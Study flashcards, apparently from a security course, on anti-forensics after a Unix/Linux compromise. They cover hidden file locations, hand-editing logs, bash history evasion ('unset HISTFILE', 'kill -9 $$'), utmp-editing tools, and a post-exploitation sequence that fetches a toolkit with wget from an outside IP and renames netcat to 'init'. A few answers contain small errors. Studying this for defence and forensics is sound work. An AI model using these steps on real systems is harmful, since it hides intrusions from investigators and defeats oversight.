Book 5: Covering Tracks on Unix and Linux Flashcards
following an inital compromise, attackers will take steps to hide thier presence on systems to avoid detection?
true
What steps will attackers take to avoid detection?
- remove artifacts following an exploit
- changing logs to remove evidence
- creating subtle hiding spaces to keep files as they collect data and pillage
What are the 3 goals of attacker
- compromise the target
- achieve post exploitation goal
- evade detection for as long as possible
What is the easist way to hide files on UNIX
name it “.” or “..”
or “…” or “ “
Easist way to hide a file in UNIX is to name the file with a dot?
yes.
wouldnt be neccessary if attacker had a rootkit or kernal mode rootkit technique/ root access but in this case he does not.
Every directory has at least two other directories
.. refers to the parent directory
. refers to the current directory
what are the 3 popular locations to hide files in UNIX?
/dev
/tmp
/etc
or
/usr/local/man
/usr/src
/dev
directory contains information about devices on the system, such as chunks of your hard drive and references to terminals. A good place to hide files.
/tmp
often contains strangely named files created by various apps to temporarily store data
the /tmp file is emptied on reboot?
true.
files stored in /tmp would need to be restored?
yes, it is a location emptied on reboot
/etc
bad place to hide files. holds machine configuration and is carefully monitored by sys admins.
What are the two increasingly popular locations to store/hide data?
/usr/local/man
and
/usr/src
Main log files can be found by viewing the ___?
/etc/syslog.conf
How can attackers find where logs are located on a UNIX system?
check /etc/syslog.conf by just checking this location or running a script that guessses where the logs are
the __ process stores the logs for the machine?
syslog
the configuration for the system logger is found in the ____ file.
/etc/syslog.conf file
if using a log clearing script to guess the location of the logs it can malfunction due to __
running the script on an improper version of linux. or not stored in their default location
Once find out where the logs are located from checking __ file, you know that they are mainly stored in which directory?
/etc/syslong.conf
/var/log
several flavors of linux store their system logs in the ___ directory
/var/log
web server (http) store their logs wihtin their own directories?
true
almost all logs within /var/log are stored in ASCII?
yes. so they can be edited with vi or nano. an attacker will and can delete these entries
What logs are of particular interest to attacker?
/var/log/secure
/var/log/messages
logs written in /var/log are in ASCII?
yes
What logs of particular service are exploited to gain access?
/var/log/httpd/error.log
/var/log/httpd/access.log
Logs written in /var/log are usually edited by?
hand, because they are ASCII and can be edited via script.
The __ where you type a command has the option of recording each command
shell
by default the __ __ included in linux stores the most recent x commands typed in.
bash shell
by default bash shell keeps track of the last __ commands, although __ on some linux distros
500
1,000
The bash history is written in ASCII and can be edited by hand?
true.
both bash history and /var/logs are written in ascii and can be edited by hand?
true
what can an attacker do to the bash history to make it look like someone else did something?
since file is ascii can plant fake commands into another users bash history file to divrt attention during an investigation
How can an attacker divert investigation?
plant false commands in another users history file
What are the problems with shell history?
You wont see your most recent command because the shell history is written when the shell is exited. They are stored in RAM until the shell is exited.
Shell history is written when the shell is ___?
exited
You wont see your most recent commands in the shell history because?
shell is written when the shell is exited
Most recent commands that would be in the shell history are stored in __ until the __ is exited
RAM
Shell
if an attacker tried to invoke the shell and typed vi .bash_history this command would show up in the shell history file?
yes
What is a unsuccesful way to try and conceal entries in the bash history?
edit the shell file
exit the shell
start another shell
edit the history file again to remove it
BUT “chicken and egg” problem, the command will be added again
What are the two widely known solutions to removing entries from bash history
- Killing the shell so that it cannot write the most recent shell history, including the commands used to edit it
- changing the environment variable HISTFiLE
how would I kill the bash shell?
kill -9 [pid]
how do I kill all bash shells?
killall -9 bash
the second process to removing entries from bash history is __ and the command is___ $ unset __ then __ __ __
changing the environment variable HISTFILE
$unset HISTFILE then KILL -9 $$
What is the 3rd option to removing entries from bash history?
adding a space before the command in bash to not log specific commands.
What are the accounting entries in UNIX?
utmp
wtmp
btmp
lastlog
file contains info about currently logged in users?
utmp
default location of utmp?
/var/run/utmp
file contains data about past user logins?
wtmp
file contains bad login entries for failed login attempts?
btmp
default location of wtmp?
/var/log
default location of btmp?
/var/log/btmp
file shows login name, port, and last login time for each user?
lastlog
default location of lastlog?
/var/log/lastlog
What are the default locations of accounting entries in UNIX?
/var/run/utmp
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
what is the only accounting log not stored within var/log
utmp
/var/log/utmp
What command will print a list of all users currently actively logged in on the system?
$who
the btmp file is usually configirued to be turned off because sys admins dont want to leave the file sitting around with bad ID attempts because it could contain passwords?
true
the accouting entry files are stored in ASCII?
FALSE
How are the accounting entries stored in UNIX?
utmp structures
Accounting entries are stored as __ structures
utmp
both bash history and /var/logs are written in ascii and can be edited by hand BUT the acccounting entries (utmp,wtmp,btmp) are not and are stored as ___?
utmp structures
to edit the accounting files you have to use specialized tools or else __?
the files will become corrupted
the accounting entries will become corrupted if you try and edit them without proper tool?
yes
What specialized tool can edit the accounting files?
remove.c
___.c can edit the utmp,wtmp,btmp and lastlog because they are stored as a specialized format called ___ ___
remove.c
utmp structures
$whoami
- checking to see which account they have gained control of on the machine- could be checking for root privilege’s
$id
get more details about the ID number and groups associated with the current account
$uname -a
detailed kernel version the system is running.
useful to further exploit system or getting an idea of types of linux machines target organization is using.
$nc
checking to see if netcat is installed on the path for the account
$wget 10.10.10.10/kitz.tgz
wget tool can download wevpages to pull a file from a machine.
$mv nc init
moving a file called nc to a file called init therefore blending in
